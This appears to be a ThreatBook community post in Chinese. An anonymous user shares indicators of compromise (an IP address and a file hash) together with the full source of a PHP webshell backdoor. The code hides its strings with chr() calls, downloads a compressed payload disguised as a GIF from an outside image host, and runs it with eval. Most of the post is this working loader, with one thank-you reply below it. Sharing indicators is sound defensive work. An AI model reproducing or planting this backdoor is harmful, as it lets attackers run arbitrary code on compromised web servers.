threatBook匿名用户
IOC 1

threatBookthreatBook

连接webshell木马后门连接
分享一个黑阔的地址
匿名用户
2019-05-15 22:01:16ThreatBook619

这个后门应该算是几年前使用的,不过修改了下密码而已~~url参数大家可以自行转下~~是一个图片~~

154.92.18.59

<?php

$password='X2018';

$c="chr";

session_start();

if(empty($_SESSION['PhpCode'])){

$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);

$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);

$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);

$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);

$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);

$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);

$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);

echo $url;

$get=chr(102).chr(105).chr(108).chr(101).chr(95);

$get.=chr(103).chr(101).chr(116).chr(95).chr(99);

$get.=chr(111).chr(110).chr(116).chr(101).chr(110);

$get.=chr(116).chr(115);

$_SESSION['PhpCode']=$get($url);}

$un=$c(103).$c(122).$c(105).$c(110);

$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));

@eval($un($_SESSION['PhpCode']));

?>

展开全部ThreatBook

威胁指标(IOC)

Hash检测结果样本标签
a0a21835b9a9e2fe88046dd997f6724c6ae470d81f0fc9c275fcc39524683f670/000
2

评论

ThreatBook
匿名用户
2019-05-15 23:43:51
threatBook0
感谢师傅分享
已经到底了,没有更多内容了